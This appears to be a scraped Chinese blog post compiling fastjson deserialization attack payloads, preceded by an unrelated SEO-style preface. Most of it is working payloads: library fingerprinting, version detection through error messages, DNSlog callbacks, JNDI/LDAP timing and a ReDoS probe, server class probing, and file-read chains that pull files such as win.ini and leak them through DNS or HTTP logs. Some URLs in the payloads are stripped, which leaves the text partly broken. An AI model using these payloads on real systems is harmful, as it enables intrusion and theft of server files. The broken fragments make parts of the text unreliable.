前言:
眼前朋友们对“apache2301”都比较着重,小伙伴们都需要了解一些“apache2301”的相关文章。那么小编在网上网罗了一些有关“apache2301””的相关文章,希望同学们能喜欢,姐妹们快快来了解一下吧!零、写在前面的话0.1 前言
在我刚接触Java安全的时候,我写过一篇零基础入门级别的文章
现在距离这篇文章的写作时间已经过去整整半年,该写写他的提高篇了。基础篇发布后,很多师傅在朋友圈发表了留言,有不少师傅提出了宝贵而真挚的建议,也有师傅(@Y1ngSec、@lenihaoa)指出我文章的不足,我在此再次表示诚挚的感谢。后来我在准备写fastjson漏洞利用提高篇的时候发现,网上的一些payload总结要么是东一块西一块很零散,要么就是没有经过仔细的校对(一些payload的注释的利用范围明显是错的,另一些给出的payload本身就是错的),要么就是说明很简短,让新手看了一头雾水不知道具体出现什么情况才是正确的。为了方便自己平时查阅利用,也为了尽量修复以上的问题,我写下了这篇文章。不过需要注意的是,这篇文章是总结性质的,是从1到n的,并非从0到1,所有我参考过的文章我都会列在文章末尾以表示感谢。
如果你觉得代码复制的不方便,可以去我的github上面下载markdown文件:
0.2 准备工作
我这里大部分直接使用safe6Sec师傅制作的复现环境(如果需要使用其他的靶场我会单独说明):
git clone
我修改了IndexController.java文件中的parse函数,方便我查看解析结果或者解析报错内容:
@PostMapping("/json")@ResponseBodypublic JSONObject parse(@RequestBody String data) { JSONObject jsonObject = new JSONObject(); try { jsonObject.put("status", 0); jsonObject.put("message", String.valueOf(JSON.parse(data))); } catch (Exception e) { jsonObject.put("status", -1); jsonObject.put("error", e.getMessage()); } return jsonObject;}接下来,如果不做特别说明的话,我都是向json接口进行post请求payload。
一、判断所使用的Json库
需要注意的是,以下大部分都是在没有报错返回的情况下利用的方法,个别的我会做出说明。
1.1 Fastjson1.1.1 dnslog判断法
payload1:
{"@type":"java.net.InetSocketAddress"{"address":,"val":"rtpmognpiy.dgrh3.cn"}}payload2:
{{"@type":"java.net.URL","val":";}:"a"}如果以上payload正常返回并受到dnslog请求,说明目标使用的是fastjson框架。
1.1.2 解析判断法
payload3:
{"ext":"blue","name":{"$ref":"$.ext"}}如果解析成功,那么说明目标使用的是fastjson:
至于这个下面的这个payload4,需要根据具体环境参数来修改,不可直接使用:
{"a":new a(1),"b":x'11',/*\*\/"c":Set[{}{}],"d":"\u0000\x00"}
本意就是如果能对上面的参数的值自动解析,说明使用了fastjson组件:
payload5:
{"@type": "whatever"}
如果对方的代码写的是像我这样显示报错内容的话,可以通过这个来判断(出现autoType is not support. whatever说明使用了fastjson),但是一般不会,所以实战中基本上用不到:
1.2 jackson1.2.1 浮点类型精度丢失判断法
如果对方传入的参数中存在一个double类型的(比如说年龄),我们就可以利用这个方法来判断。正常传参:
{"score": 1}payload6:
{"score": 1.1111111111111111111111111111111111111111111111111111111111111}如果返回结果是类似1.1111111111111112这种,那么就说明使用的可能是jackson(fastjson如果不加Feature.UseBigDecimal这个参数,也会丢失精度;gson也是会丢失精度的;因此可以继续利用前面的payload来进一步区分fastjson、jackson和gson):
1.2.2 注释符判断法
payload7:
{"age": 1}/*#W01fh4cker如果不报错,说明使用的是jackson:
1.2.3 单引号判断法
正常传参:
{"username": "admin", "password": "admin"}payload8:
{"username": 'admin', "password": 'admin'}如果改成单引号,报错如上,那么就是jackson。fastjson是不报错的:
1.2.4 多余类成员判断法
正常传参:
{"username": "admin", "password": "admin"}payload9:
{"username": "admin", "password": "admin", "test": 1}如果报错如下,则说明是jackson:
fastjson是不会报错的,这里我们请求doLogin路由来验证:
POST /doLogin?username=admin&password=admin&test=1&rememberme=remember-me HTTP/1.1
Host: 10.0.47.4:8888
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=8D9951E527FEE008DB7B874D70636D86
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
image.png
1.3 gson1.3.1 浮点类型精度丢失判断法
在1.2.1中我们已经讨论过了,在此不做赘述。
1.3.2 注释符判断法
payload10:
#\r\n{"score":1.1}正常说明为gson。
1.4 org.json
payload11:
{"username": '\r', "password": "admin"}出现如上报错,说明使用的是org.json,这个就需要能看到报错的内容了。
1.5 hutool.json
payload12:
{a:whatever}/*\r\nxxx如果返回正确(最好是能看到返回的值为{"a":"whatever"}),说明使用的是hutool.json:
二、判断fastjson版本2.1 有报错信息返回的情况
开发人员如果对异常信息处理不当,就给了我们有机可乘的机会,以下是一些常用的在有报错信息返回的情况下的判断fastjson版本的方法。payload13:
{"@type":"java.lang.AutoCloseable"payload14:
["test":1]
这里我们使用浅蓝师傅的靶场:
需要说明的是,该payload只适用于 至于["test":1]这个payload,我在该靶场没有测试成功;我后来自己写了个demo,测试成功,大家也可以自行测试:
对于payload13的报错情况,我们还可以细分。如果代码在写的时候几乎没有做任何异常处理(这种情况挺少见的),那么我们根据报错的代码出错点很快就可以判断出对方使用的是parseObject还是parse来处理数据的;否则我们只能根据有限的返回的报错信息来判断:
2.1.1 JSON.parseObject(jsondata, User.class)2.1.1.1 判断1.1.15<=version<=1.1.26
报错:
syntax error, expect {, actual EOF2.1.1.2 判断1.1.27<=version<=1.2.11报错会显示错误的行数:
syntax error, expect {, actual EOF, pos 92.1.1.3 判断1.2.12<=version<=1.2.24报错:
type not match2.1.1.4 判断1.2.25<=version<=2.0.1
报错(后面接具体的类):
type not match. java.lang.AutoCloseable -> org.example.Main$User
其中,fastjson2以后,都会多一处报错,后面的情况也是一样的:
Caused by: com.alibaba.fastjson2.JSONException...2.1.1.5 判断2.0.1<=version<=2.0.5.graal以及2.0.9<=version<=2.0.12
报错类似如下:
error, offset 35, char2.1.1.6 判断2.0.6<=version<=2.0.7
报错:
illegal character2.1.1.7 判断2.0.8以及2.0.13<=version<=2.0.40(我写这篇文章的时候的最新版本)
报错内容中会直接显示当前版本的版本号,很方便:
illegal character , offset 35, character , line 1, column 35, fastjson-version 2.0.8 {"@type":"java.lang.AutoCloseable"2.1.2 JSON.parse(jsonData);2.1.2.1 判断1.1.15<=version<=1.1.26报错:
syntax error, expect {, actual EOF2.1.2.2 判断1.1.27<=version<=1.2.32报错类似如下:
syntax error, expect {, actual EOF, pos 02.1.2.3 判断1.2.33<=version<=2.0.40报错中都会直接显示版本号:fastjson1中显示如下:
syntax error, expect {, actual EOF, pos 0, fastjson-version 1.2.83fastjson2中显示如下:
Illegal syntax: , offset 34, character , line 1, column 35, fastjson-version 2.0.40 {"@type":"java.lang.AutoCloseable"但是需要注意的是1.2.76<=version<=1.2.80的时候,显示的版本都是1.2.76,原因是作者写死在代码里了,我提了个issue():
2.2 dnslog判断法
特别说明:dns能出网并不代表存在fastjson漏洞!!!另外,讨论1.2.24以前的版本没什么意义,因此基本不会在下文中涉及。
2.2.1 判断1.1.15<=version<=1.2.24
正常传参:
{"name":"admin","email":"admin","content":"admin"}payload15:
{"name":"admin","email":"admin","content":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://aclarecpsj.dgrh3.cn/POC","autoCommit":true}}2.2.2 判断1.2.37<=version<=1.2.83payload16:
{{"@type":"java.net.URL","val":";}:"aaa"}2.2.3 判断1.2.9<=version<=1.2.47payload17:
{"username":{"@type":"java.net.InetAddress","val":"bjmgclhjrs.dgrh3.cn"}, "password":"admin"}需要注意,有时候会报错如下,但是dnslog仍然会收到请求,这个是目标服务器的问题,多试就可以了:
deserialize inet adress error2.2.4 判断1.2.10<=version<=1.2.47
payload18:
[{"@type":"java.lang.Class","val":"java.io.ByteArrayOutputStream"},{"@type":"java.io.ByteArrayOutputStream"},{"@type":"java.net.InetSocketAddress"{"address":,"val":"6m2csu.dnslog.cn"}}]除非对方有以下代码,否则1.2.47以后的版本都会报错:
ParserConfig.getGlobalInstance().addAccept("java.lang.Class");ParserConfig.getGlobalInstance().addAccept("java.io.ByteArrayOutputStream");2.2.5 判断1.2.9<=version<=1.2.36payload19:
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":";}}""}如果不报错、dnslog无响应,说明版本处于1.2.9至1.2.36。
2.2.6 判断1.2.37<=version<=1.2.83
还是上面的payload19,如果dnslog有响应,说明处于1.2.37和1.2.83之间。
2.2.7 判断1.2.9<=version<=1.2.83
payload20:
Set[{"@type":"java.net.URL","val":";}]2.2.8 判断version≠(1.2.24 || 1.2.83)payload21:
{"page":{"pageNumber":1,"pageSize":1,"zero":{"@type":"java.lang.Exception","@type":"org.XxException"}}}只有1.2.25<=version<=1.2.80的时候会报错,其他情况包括1.1和2.0的版本都是不会报错的。
2.2.9 判断1.2.69<=version<=1.2.83
payload22:
{"page":{"pageNumber":1,"pageSize":1,"zero":{"@type":"java.lang.AutoCloseable","@type":"java.io.ByteArrayOutputStream"}}}如果报错(autoType is not support. java.io.ByteArrayOutputStream),说明版本处于1.2.69和1.2.83之间;如果不报错,说明处于1.2.24到1.2.68之间。
2.2.10 判断1.2.48<=version<=1.2.83
payload23:
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl"}}大部分情况下,如果报错,说明版本处于1.2.48到1.2.83,但是有时候也可能因为环境本身而出现奇奇怪怪的问题,比如我这里1.2.24也报错,只是报错内容不同:
1.2.47也报错,报错内容和前两者都不同:
由于我们不知道报错的详细信息,因此感觉不能作为一个精确判断的方法。我后来又拿之前的demo进行测试,发现符合结论,师傅们利用的时候须要注意。
2.2.11 判断version=1.2.24
payload24:
{"zero": {"@type": "com.sun.rowset.JdbcRowSetImpl"}}按照@kezibei师傅给出的结论,这个payload只有1.2.24是不报错的,但是我本地靶场环境1.2.24也报错,只是和其他版本的不同:
我又拿demo测试了下,发现符合结论:
2.3 延迟判断法2.3.1 浅蓝正则ddos探测法:1.2.36<=version<=1.2.63_noneautotype
payload25:
{"regex":{"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"},"blue":"aaa!"}该payload慎用,可能会影响业务系统,实战中应当逐步加a,不要一上来就输入一堆a。有延迟,说明版本处于1.2.36和1.2.63_noneautotype之间。尽管需要慎用,但是该payload的魅力还是很大的,一旦成功说明该系统很有可能可以拿下该系统权限。
2.3.2 jndi请求延迟探测法
Tips:可以在ldap://ip后面加上端口,这样就可以探测内外端口开放情况了,类似ssrf。
2.3.2.1 判断1.2.4<=version<=1.2.47
payload26(组合拳):
{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://1.2.3.4/test111","autoCommit":true}}{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://127.0.0.1/test111","autoCommit":true}}先用第一个,再用第二个,如果第一个响应时间很长,而第二个较短,则说明版本:
2.3.2.2 判断1.1.16<=version<=1.2.24
payload27(组合拳):
{"username":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4/POC","autoCommit":true}}{"username":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/POC","autoCommit":true}}和payload26一样,如果下面的比上面的响应快说明版本处于1.1.16和1.2.24之间;1.1.15我本地测试的时候响应很快但是报错Duplicate field name "matchColumn_asm_prefix__" with signature "[C" in class file Fastjson_ASM_JdbcRowSetImpl_1。
2.3.2.3 变种:判断1.1.16<=version<=1.2.11
如果对方用的是JSON.parseObject,那么payload27还有变种。payload28(组合拳):
{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4/POC", "autoCommit":true}}""}{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/POC", "autoCommit":true}}""}如果下面比上面响应快,说明版本处于1.1.16和1.2.11之间。
2.3.2.4 判断1.2.28<=version<=1.2.47
payload29(组合拳):
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4/POC","autoCommit":true}}{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/POC","autoCommit":true}}如果下面比上面响应快,说明版本处于1.2.28和1.2.47之间。
2.3.2.5 变种:判断1.2.9<=version<=1.2.11
如果对方用的是JSON.parseObject,那么payload29还有变种。payload30(组合拳):
{"@type":"com.alibaba.fastjson.JSONObject","a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4/POC","autoCommit":true}}{"@type":"com.alibaba.fastjson.JSONObject","a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1/POC","autoCommit":true}}如果下面比上面响应快,说明版本处于1.2.9和1.2.11之间。
2.4 关键版本探测2.4.1 v1.2.24
直接用2.3中所提到的延时判断方法即可。
2.4.2 v1.2.47
payload31:
{"username":{"@type": "java.net.InetSocketAddress"{"address":,"val":"rylxkswlfg.dgrh3.cn"}}}或者:
[{"@type": "java.lang.Class","val": "java.io.ByteArrayOutputStream"},{"@type": "java.io.ByteArrayOutputStream"},{"@type": "java.net.InetSocketAddress"{"address":,"val":"rylxkswlfg.dgrh3.cn"}}]都是可以的:
2.4.3 v1.2.68
payload32:
[{"@type": "java.lang.AutoCloseable","@type": "java.io.ByteArrayOutputStream"},{"@type": "java.io.ByteArrayOutputStream"},{"@type": "java.net.InetSocketAddress"{"address":,"val": "mwhajokbdd.dgrh3.cn"}}]2.4.4 v1.2.80与v1.2.83需要准备两个dnslog地址,我这里yakit上开一个dnslog.cn开一个。payload33:
[{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","x": {"@type": "java.net.InetSocketAddress"{"address":,"val": "xfjdbd.dnslog.cn"}}},{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","message": {"@type": "java.net.InetSocketAddress"{"address":,"val": "uawcowbohf.dgrh3.cn"}}}]如果第一个收到响应而第二个没有收到,说明版本为1.2.80:
如果两个都收到了,说明版本是1.2.83:
三、探测服务器环境3.1 空值判断法
待探测列表如下:
org.springframework.web.bind.annotation.RequestMappingorg.apache.catalina.startup.Tomcatgroovy.lang.GroovyShellcom.mysql.jdbc.Driverjava.net.http.HttpClient
payload34:
{"z": {"@type": "java.lang.Class","val": "org.springframework.web.bind.annotation.RequestMapping"}}如果系统存在这个类,会返回一个类实例;如果不存在会返回null。例如:
3.2 dnslog回显判断法
payload35:
{"@type":"java.net.Inet4Address","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type": "java.lang.String""@type":"java.util.Locale","language":{"@type":"java.lang.String"{1:{"@type":"java.lang.Class","val":"com.mysql.jdbc.Driver"}},"country":"aaa.qmc8xj4s.dnslog.pw"}}}只有MacOS可以ping带花括号的域名,Linux和Windows会报错,所以该payload需要特定环境才可以。
3.3 报错回显判断法
payload36:
{"x": {"@type": "java.lang.Character"{"@type": "java.lang.Class","val": "com.mysql.jdbc.Driver"}}四、文件读取4.1 fastjson【1.2.73<=version<=1.2.80】4.1.1 aspectjtools4.1.1.1 直接回显法payload37(组合拳):可以分三次打:
{ "@type":"java.lang.Exception", "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"}{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{ "@type":"java.lang.String""@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException","newAnnotationProcessorUnits":[{}]}}}{ "username":{ "@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit", "@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit", "fileName":"c:/windows/win.ini" }, "password":"admin"}也可以直接利用JSON.parse可以解析[]的特性直接一次打:
[{"@type":"java.lang.Exception","@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"},{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException","newAnnotationProcessorUnits":[{}]}}},{"username":{"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit","@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit","fileName":"c:/windows/win.ini"},"password":"admin"}]
4.1.1.2 报错回显法
payload38:
[{"@type":"java.lang.Exception","@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"},{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException","newAnnotationProcessorUnits":[{}]}}},{"username":{"@type":"java.lang.Character"{"c":{"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit","@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit","fileName":"c:/windows/win.ini"}},"password":"admin"}]4.1.1.3 dnslog回显法(需要对方为mac环境且dnslog平台支持特殊符号)payload39:
[{"@type":"java.lang.Exception","@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"},{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException","newAnnotationProcessorUnits":[{}]}}},{"username":{"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit","@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit","fileName":"1.txt"},"password":{"@type":"java.net.Inet4Address","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type": "java.lang.String""@type":"java.util.Locale","language":{"@type":"java.lang.String"{"$ref":"$"},"country":"aaa.qmc8xj4s.dnslog.pw"}}}}]但是只有mac才支持ping带花括号的域名,所以我Windows这里会提示deserialize inet adress error:
4.1.1.4 httplog回显法(另需ognl>=2.7以及commons-io>=2.0)
分两次打。
payload40(组合拳):
[{"@type":"java.lang.Exception","@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"},{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException","newAnnotationProcessorUnits":[{}]}}},{"username":{"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit","@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit","fileName":"test"},"password":"admin"}]{"su14":{"@type":"java.lang.Exception","@type":"ognl.OgnlException"},"su15":{"@type":"java.lang.Class","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"ognl.OgnlException","_evaluation":""}},"su16":{"@type":"ognl.Evaluation","node":{"@type":"ognl.ASTMethod","p":{"@type":"ognl.OgnlParser","stream":{"@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"java.util.Locale","language":";,"country":{"@type":"java.lang.String"[{"@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit","fileName":"C:/Windows/win.ini"}]}}},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[36]}]}}}},"su17":{"$ref":"$.su16.node.p.stream"},"su18":{"$ref":"$.su17.bOM.bytes"}}我这里实际测试过程中,文件中有中文字符的时候出现了乱码:
我的解决方法是,使用yakit的端口监听器:
yakit真是太好用了,有木有~
4.1.2 aspectjtools+xalan(>=2.4.0)+dom4j(版本无限制)4.1.2.1 直接回显法
分五次打,中间报错不用管。
payload41(组合拳):
[{"@type":"java.lang.Exception","@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"},{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException","newAnnotationProcessorUnits":[{}]}}},{"username":{"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit","@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit","fileName":"test"},"password":"admin"}]{"@type":"java.lang.Exception","@type":"org.apache.xml.dtm.DTMConfigurationException","locator":{}}{"@type":"java.lang.Class","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"org.apache.xml.dtm.DTMConfigurationException","locator":{}}}}{"su14":{"@type":"javax.xml.transform.SourceLocator","@type":"org.apache.xpath.objects.XNodeSetForDOM","nodeIter":{"@type":"org.apache.xpath.NodeSet"},"xctxt":{"@type":"org.apache.xpath.XPathContext","primaryReader":{"@type":"org.dom4j.io.XMLWriter","entityResolver":{"@type":"org.dom4j.io.SAXContentHandler","inputSource":{"byteStream":{"@type":"java.io.InputStream"}}}}}}}{"su15":{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":";},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[98]}]}}4.1.2.2 httplog回显法修改4.1.2.1中最后一步为如下payload:
{"@type":"java.io.InputStream","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.lang.String""@type":"java.util.Locale","language":";,"country":{"@type":"java.lang.String"[{"@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit","fileName":"C:/Users/whoami/Desktop/testtest.txt"}]}}},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[98]}]}我这里demo复现是成功的,但是靶场没有成功,如果有兄弟成功了可以公众号后台直接发消息,我看到立马就会回复,并将这部分在我的博客中更新。
4.2 fastjson【1.2.37<=version<=1.2.68】4.2.1 blackhat2021-getBom()原版(适用场景有限)
payload42:
{ "abc":{"@type": "java.lang.AutoCloseable", "@type": "org.apache.commons.io.input.BOMInputStream", "delegate": {"@type": "org.apache.commons.io.input.ReaderInputStream", "reader": { "@type": "jdk.nashorn.api.scripting.URLReader", "url": "; }, "charsetName": "UTF-8", "bufferSize": 1024 },"boms": [ { "@type": "org.apache.commons.io.ByteOrderMark", "charsetName": "UTF-8", "bytes": [ 59 ] } ] }, "address" : {"$ref":"$.abc.BOM"}}它会拿win.ini的内容转成int数组,然后拿ByteOrderMark里的bytes挨个字节遍历去比对,如果遍历过程有比对错误的getBom就会返回一个null,如果遍历结束,没有比对错误那就会返回一个ByteOrderMark对象。所以这里文件读取成功的标志应该是getBom返回结果不为null。
有点sql注入中布尔盲注的味道,哈哈。
附上读取文件内容到字节数组的代码:
import java.io.FileReader;import java.io.IOException;public class str2bytes { public static String fileToString(String path) throws IOException { FileReader reader = new FileReader(path); StringBuilder stringBuilder = new StringBuilder(); char[] buffer = new char[10]; int size; while ((size = reader.read(buffer)) != -1) { stringBuilder.append(buffer, 0, size); } return stringBuilder.toString(); } public static void main(String[] args) throws IOException { String str = fileToString("C:\\Windows\\win.ini"); byte[] byteArray = str.getBytes("UTF-8"); boolean first = true; for (byte b : byteArray) { int intValue = b & 0xFF; if (first) { System.out.print(intValue); first = false; } else { System.out.print(", " + intValue); } } }}//59, 32, 102, 111, 114, 32, 49, 54, 45, 98, 105, 116, 32, 97, 112, 112, 32, 115, 117, 112, 112, 111, 114, 116, 13, 10, 91, 102, 111, 110, 116, 115, 93, 13, 10, 91, 101, 120, 116, 101, 110, 115, 105, 111, 110, 115, 93, 13, 10, 91, 109, 99, 105, 32, 101, 120, 116, 101, 110, 115, 105, 111, 110, 115, 93, 13, 10, 91, 102, 105, 108, 101, 115, 93, 13, 10, 91, 77, 97, 105, 108, 93, 13, 10, 77, 65, 80, 73, 61, 49, 13, 104.2.2 blackhat2021-getBom()浅蓝师傅改版(几乎适配所有场景)payload43:
{"abc":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":";},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[98]}]},"address":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String"{"$ref":"$.abc.BOM[0]"},"start":0,"end":0},"xxx":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":";},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[1]}]},"zzz":{"$ref":"$.xxx.BOM[0]"}}极端场景:有一个接口,用fastjson解析了json,但不会反馈任何能够作为状态判断的标识,连异常报错的信息都没有。
那么此时该payload就可以派上用场了,如果以上poc收到了dnslog响应,那么说明字节码比对失败,也就是第一个字节的int值不等于我们填入的那个数字(比如这里的98,此时我们就得更改数字继续测试);如果没收到,说明比对成功,继续测试即可。
4.2.3 blackhat2021-getBom() tyskill师傅改版(几乎适配所有场景)
payload44:
{"abc":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":";},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"@type":"org.apache.commons.io.ByteOrderMark","charsetName":"UTF-8","bytes":[98,]}]},"address":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.BOMInputStream","delegate":{"@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"jdk.nashorn.api.scripting.URLReader","url":";},"charsetName":"UTF-8","bufferSize":1024},"boms":[{"$ref":"$.abc.BOM[0]"}]},"xxx":{"$ref":"$.address.BOM[0]"}}该payload是浅蓝师傅的payload的改版,主要区别在于这个是dnslog或者http服务有响应说明字节码比对成功,和浅蓝的那个是反着来的。
五、文件写入5.1 commons-io 2.x(1.2.37<=version<=1.2.68)5.1.1 最初公开的payload(只能在centos下利用)
payload45:
